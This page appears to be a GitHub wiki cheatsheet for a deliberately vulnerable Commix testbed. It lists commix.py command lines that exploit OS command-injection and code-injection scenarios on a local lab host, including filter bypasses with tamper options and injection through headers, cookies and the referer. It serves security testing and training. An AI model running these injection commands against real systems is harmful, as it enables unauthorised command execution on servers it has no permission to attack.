-
Notifications
You must be signed in to change notification settings - Fork 60
Commix Testbed Cheatsheet
Note: The following examples are based on dockerized version of Commix-testbed (e.g. http://lab:9090).
Classic regular example exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic.php?addr=127.0.0.1"
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic.php" --data="addr=127.0.0.1"
Classic (Base64) regular example exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_b64.php?addr=MTI3LjAuMC4x"
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_b64.php" --data="addr=MTI3LjAuMC4x"
Classic (Hex) regular example exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_hex.php?addr=3132372E302E302E31"
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_hex.php" --data="addr=3132372E302E302E31"
Classic single-quote example exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_quote.php?addr=127.0.0.1" --level=3
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_quote.php" --data="addr=127.0.0.1" --level=3
Classic double-quote example exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_double_quote.php?addr=127.0.0.1" --level=3
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_double_quote.php" --data="addr=127.0.0.1" --level=3
Classic non-space example exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_non_space.php?addr=127.0.0.1" --tamper="space2ifs"
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_non_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"
Classic blacklisting example exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_blacklisting.php?addr=127.0.0.1"
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_blacklisting.php" --data="addr=127.0.0.1"
Classic hashing example exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_hash.php?addr=127.0.0.1"
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_hash.php" --data="addr=127.0.0.1"
Classic example & Basic HTTP authentication exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_basic_auth.php?addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="basic"
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_basic_auth.php" --data="addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="basic"
Classic example & Digest HTTP authentication exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_digest_auth.php?addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="digest"
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_digest_auth.php" --data="addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="digest"
Blind regular example exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/blind.php?addr=127.0.0.1"
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/blind.php" --data="addr=127.0.0.1"
Double Blind regular example exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/double_blind.php?addr=127.0.0.1"
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/double_blind.php" --data="addr=127.0.0.1"
Eval regular example exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/eval.php?user=test"
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/eval.php" --data="user=test"
Eval (Base64) regular example exploitation:
-
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/eval_b64.php?user=MTI3LjAuMC4x"
-
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/eval_b64.php" --data="user=MTI3LjAuMC4x"
Classic (SOAP/XML) regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_xml.php" --data='<?xml version="1.0" encoding="UTF-8"?><ping><addr>localhost</addr><count>1</count></ping>'
Blind (SOAP/XML) regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/blind_xml.php" --data='<?xml version="1.0" encoding="UTF-8"?><ping><addr>localhost</addr><count>1</count></ping>'
Classic (JSON) regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_json.php" --data='{"addr":"test","test":"ancst"}'
Blind (JSON) regular example
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/blind_json.php" --data='{"addr":"test","test":"ancst"}'
Eval (JSON) regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/eval_json.php" --data='{"name":"ancst"}'
Preg_match() regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/preg_match.php?addr=127.0.0.1"
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/preg_match.php" --data="addr=127.0.0.1"
Preg_match() blind example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/preg_match.php?addr=127.0.0.1"
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/preg_match.php" --data="addr=127.0.0.1"
Preg_Replace() regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/preg_replace.php?replace=/Hello/&with=Bye" -p with
Assert() regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/assert.php?user=ancst"
Str_Replace() regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/str_replace.php?user=ancst"
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/str_replace.php" --data="user=ancst"
Create_Function() regular example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/regular/GET/create_function.php?user=ancst"
python3 commix.py -u "http://lab:9090/scenarios/regular/POST/create_function.php" --data="user=ancst"
Regex for domain name validation example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/lax_domain_name.php" --data="addr=127.0.0.1" --suffix="d.e.f"
Nested quotes example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/nested_quotes.php" --data="addr=127.0.0.1" --level=3
Regex filter for colon/pipe/ampersand/dollar example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php"
Regex filter for spaces example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"
Regex filter for space/colon/pipe/ampersand example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab
Regex filter for space/colon/pipe/ampersand/dollar example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab
Regex filter for white chars example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_white_chars.php" --data="addr=127.0.0.1" --tamper="space2ifs"
Alphanum for input end example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/simple_stop_alphanum.php" --data="addr=127.0.0.1"
Alphanum for input end (filter for white chars) example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_white_chars_stop_alnum.php" --data="addr=127.0.0.1" --tamper="space2ifs"
Alphanum for input start example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/simple_start_alphanum.php" --data="addr=127.0.0.1"
Alphanum for input start (filter for white chars) example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/no_white_chars_start_alphanum.php" --data="addr=127.0.0.1" --tamper="space2ifs"
Regex filter for OS commands (Windows / *nix) example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/filters/multiple_os_commands_blacklisting.php" --data="addr=127.0.0.1" --tamper="uninitializedvariable"
Classic user-agent-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/user-agent/ua(classic).php" -p user-agent
Blind user-agent-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/user-agent/ua(blind).php" -p user-agent
Eval user-agent-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/user-agent/ua(eval).php" -p user-agent
Classic cookie-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(classic).php" -p addr
Classic cookie-based (Base64) example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(b64).php" -p addr
Blind cookie-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(blind).php" -p addr
Eval cookie-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(eval).php" -p user
Classic referer-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/referer/referer(classic).php" -p referer
Blind referer-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/referer/referer(blind).php" -p referer
Eval referer-based example exploitation:
python3 commix.py -u "http://lab:9090/scenarios/referer/referer(eval).php" -p referer